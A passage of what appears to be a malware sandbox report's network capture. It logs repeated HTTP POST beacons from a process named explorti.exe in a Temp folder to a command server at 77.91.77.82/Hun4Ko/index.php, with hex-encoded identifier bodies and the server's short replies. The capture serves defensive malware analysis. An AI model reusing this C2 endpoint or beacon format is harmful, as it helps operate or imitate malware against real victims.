                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:17.175272942 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:17 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      73192.168.2.44981277.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:17.289309025 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:17.974179983 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:17 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      74192.168.2.44981377.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:17.983819962 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      75192.168.2.44981477.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:18.557374001 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:19.274925947 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:19 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:17:19.278269053 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:19.503323078 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:19 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      76192.168.2.44981577.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:19.629662991 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:20.345093966 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      77192.168.2.44981677.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:20.355640888 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:21.063575029 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      78192.168.2.44981777.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:21.180274010 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:21.915277004 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:21 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      79192.168.2.44981877.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:21.925698042 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:22.641669035 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:22 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      80192.168.2.44981977.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:22.757579088 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:23.468002081 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:23 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      81192.168.2.44982077.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:23.476404905 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:24.376812935 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:24 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0
                      Jun 28, 2024 21:17:24.377245903 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:24 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      82192.168.2.44982177.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:24.492381096 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:25.189587116 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:25 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      83192.168.2.44982277.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:25.199373960 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:25.907032013 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:25 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      84192.168.2.44982377.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:26.023742914 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:26.731261015 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:26 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      85192.168.2.44982477.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:26.739814997 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:27.446261883 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:27 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      86192.168.2.44982577.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:27.571084023 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:28.270997047 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:28 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      87192.168.2.44982677.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:28.280119896 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:29.009507895 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:28 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      88192.168.2.44982777.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:30.176207066 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:30.879180908 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:30 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      89192.168.2.44982877.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:30.887717009 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:31.596947908 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:31 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      90192.168.2.44982977.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:31.712097883 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:32.436858892 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:32 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      91192.168.2.44983077.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:32.445812941 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:33.159317017 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:33 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      92192.168.2.44983177.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:33.277276993 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:33.981115103 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:33 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      93192.168.2.44983277.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:33.991854906 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:34.702681065 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:34 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      94192.168.2.44983377.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:34.826276064 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
